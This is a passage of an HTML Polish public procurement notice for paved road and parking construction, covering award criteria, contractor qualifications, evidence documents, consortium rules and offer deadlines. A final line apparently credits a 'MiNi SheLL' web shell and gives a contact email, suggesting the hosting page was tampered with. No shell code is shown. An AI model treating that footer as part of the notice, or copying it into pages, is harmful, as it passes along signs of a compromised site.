kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: <br/>1) nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz <br/>2) spełniają niżej określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie formułuje wymagań w tym zakresie.<br/>2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów:<br/>Zamawiający nie formułuje wymagań w tym zakresie.<br/>3) Sytuacji ekonomicznej lub finansowej: Zamawiający nie formułuje wymagań w tym zakresie.<br/>4) Zdolności technicznej lub zawodowej: <br/>W celu potwierdzenia spełnienia tego warunku Wykonawca wykaże, że:<br/>a)	Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał w sposób należyty, zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej 2 roboty budowlane, z których każda polegała na budowie lub przebudowie drogi, parkingu, stanowisk postojowych lub placu manewrowego o nawierzchni utwardzonej z kostki brukowej (betonowej) o wartości robót minimum 400 000,00 zł brutto każda.<br/>Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego wykazu robót budowlanych w postępowaniu według Załącznika nr 6 do SWZ.<br/>b)	Przewidziana przez Wykonawcę osoba, która będzie uczestniczyć w wykonaniu zamówienia jako kierownik budowy, posiada uprawnienia o specjalności inżynieryjnej drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów <br/>i może pełnić funkcję kierownika budowy w myśl obowiązujących przepisów prawa. Osoba powinna posiadać odpowiednie uprawnienia budowlane, a więc uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, wydane na podstawie ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. Z 2025 r. poz. 418) oraz Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29.04.2019 r. w sprawie Przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r. poz. 831) lub odpowiadające im ważne uprawnienia budowlane wydane na mocy wcześniej obowiązujących przepisów oraz aktualne zaświadczenie o wpisie na listę członków właściwej izby samorządu zawodowego (zgodnie z ustawą z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa – t.j. Dz. U. z 2023 r. poz. 551, 2025 r. poz. 619). Osobami na stanowiska wymienione powyżej mogą być również, zgodnie z art. 12a ustawy Prawo budowlane, osoby, których odpowiednie kwalifikacje zostały uznane na zasadach określonych w przepisach odrębnych, w szczególności w przepisach ustawy z dnia 22 grudnia 2015 r. <br/>o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. 2023 poz. 334, z 2025 r. poz. 619). <br/>Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego w postępowaniu wykazu osób, według Załącznika nr 7 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art.274ust.1 ustawy Prawo zamówień publicznych Zamawiający przed udzieleniem zamówienia, wezwie wykonawcę (lub wykonawców),którego<br/>oferta została najwyżej oceniona,do złożenia w wyznaczonym, nie krótszym niż 5 dni, od dnia wezwania podmiotowych środków<br/>dowodowych aktualnych na dzień ich złożenia (jeśli dotyczy).W celu potwierdzenia braku podstaw do wykluczenia wykonawcy z<br/>udziału w postępowaniu,o których mowa w rozdziale IX ust.1 i ust.3SWZ Zamawiający żąda na wezwanie następujących dokumentów:oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu,o którym mowa w art.125ust.1ustawyPzp,w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w art.108 ust.1ustawy Pzp oraz w art.109 ust.1 pkt4,5,7ustawyPzp,(według wzoru stanowiącego Zał.nr5doSWZ).Wykonawca nie jest<br/>zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich<br/>złożenia.Samooczyszczenie – w okolicznościach określonych w art.108ust.1 pkt1,2,i5ustawyPzp wykonawca nie podlega<br/>wykluczeniu jeżeli udowodni zamawiającemu, że spełnił łącznie następujące przesłanki:1.naprawił lub zobowiązał się do<br/>naprawienia szkody wyrządzonej przestępstwem, wykroczeniem lub swoim nieprawidłowym postępowaniem, w tym poprzez<br/>zadośćuczynienie pieniężne;2.wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem, wykroczeniem lub swoim<br/>nieprawidłowym postępowaniem oraz spowodowanymi przez nie szkodami, aktywnie współpracując odpowiednio z właściwymi<br/>organami, w tym organami ścigania lub zamawiającym;3.podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla zapobiegania dalszym przestępstwom, wykroczeniom lub nieprawidłowemu postępowaniu, w szczególności:a)zerwał wszelkie powiązania z osobami lub podmiotami odpowiedzialnymi za nieprawidłowe postępowanie wykonawcy,b)zreorganizował personel,c)wdrożył system sprawozdawczości i kontroli,d)utworzył struktury audytu wewnętrznego do monitorowania przestrzegania przepisów, wewnętrznych regulacji lub standardów,e)wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań za nieprzestrzeganie przepisów, wewnętrznych regulacji lub standardów.Zamawiający ocenia, czy podjęte przez wykonawcę czynności są wystarczające do wykazania jego rzetelności, uwzględniając wagę i szczególne okoliczności czynu wykonawcy, a jeżeli uzna, że nie są wystarczające, wyklucza wykonawcę.Szczegółowe informacje zostały zawarte w rozdz.X SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art.274ust.1 ustawy Prawo zamówień publicznych Zamawiający przed udzieleniem zamówienia, wezwie wykonawcę (lub wykonawców),którego<br/>oferta została najwyżej oceniona,do złożenia w wyznaczonym, nie krótszym niż 5 dni, od dnia wezwania podmiotowych środków<br/>dowodowych aktualnych na dzień ich złożenia (jeśli dotyczy).W celu potwierdzenia braku podstaw do wykluczenia wykonawcy z<br/>udziału w postępowaniu,o których mowa w rozdziale VIII ust. 2 pkt 4 SWZ Zamawiający żąda na wezwanie następujących dokumentów:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, <br/>o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty (wzór stanowi Załącznik nr 6 do SWZ);<br/>Uwaga! Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonanych wspólnie z innymi wykonawcami, wykaz dotyczy robót, faktycznie przez niego wykonanych.<br/>b) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich uprawnień niezbędnych do wykonania zamówienia, <br/>a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, sporządzony według wzoru stanowiącego Załącznik nr 7 do SWZ.Wykonawca nie jest<br/>zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich<br/>złożenia.Samooczyszczenie – w okolicznościach określonych w art.108ust.1 pkt1,2,i5ustawyPzp wykonawca nie podlega<br/>wykluczeniu jeżeli udowodni zamawiającemu, że spełnił łącznie następujące przesłanki:1.naprawił lub zobowiązał się do<br/>naprawienia szkody wyrządzonej przestępstwem, wykroczeniem lub swoim nieprawidłowym postępowaniem, w tym poprzez<br/>zadośćuczynienie pieniężne;2.wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem, wykroczeniem lub swoim<br/>nieprawidłowym postępowaniem oraz spowodowanymi przez nie szkodami, aktywnie współpracując odpowiednio z właściwymi<br/>organami, w tym organami ścigania lub zamawiającym;3.podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla zapobiegania dalszym przestępstwom, wykroczeniom lub nieprawidłowemu postępowaniu, w szczególności:a)zerwał wszelkie powiązania z osobami lub podmiotami odpowiedzialnymi za nieprawidłowe postępowanie wykonawcy,b)zreorganizował personel,c)wdrożył system sprawozdawczości i kontroli,d)utworzył struktury audytu wewnętrznego do monitorowania przestrzegania przepisów, wewnętrznych regulacji lub standardów,e)wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań za nieprzestrzeganie przepisów, wewnętrznych regulacji lub standardów.Zamawiający ocenia, czy podjęte przez wykonawcę czynności są wystarczające do wykazania jego rzetelności, uwzględniając wagę i szczególne okoliczności czynu wykonawcy, a jeżeli uzna, że nie są wystarczające, wyklucza wykonawcę.Szczegółowe informacje zostały zawarte w rozdz.X SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, która<br/>część zamówienia zostanie wykonana przez poszczególnych wykonawców. Przedmiotowe oświadczenie zawiera załącznik<br/>nr 2a do SWZ.<br/>4 Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie.<br/>5 W przypadku złożenia oferty przez konsorcjum należy wymienić firmy wchodzące w jego skład oraz wskazać Lidera<br/>Konsorcjum.<br/>6 Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>7 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>8 Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający zażąda<br/>przed zawarciem umowy w sprawie zamówienia publicznego, kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje dokonanie zmian postanowień treści zawartej umowy w przypadku zaistnienia okoliczności<br/>wskazanych w §13 Projektowanych postanowieniach umowy, stanowiących Załącznik nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-31 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-31 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy.<br/>Wykonawca przed podpisaniem umowy zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy na<br/>sumę stanowiącą 5% ceny całkowitej (ceny brutto) podanej w Formularzu oferty. Pozostałe wymagania dotyczące<br/>zabezpieczenia należytego wykonania umowy zawarte są w rozdziale XIX SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com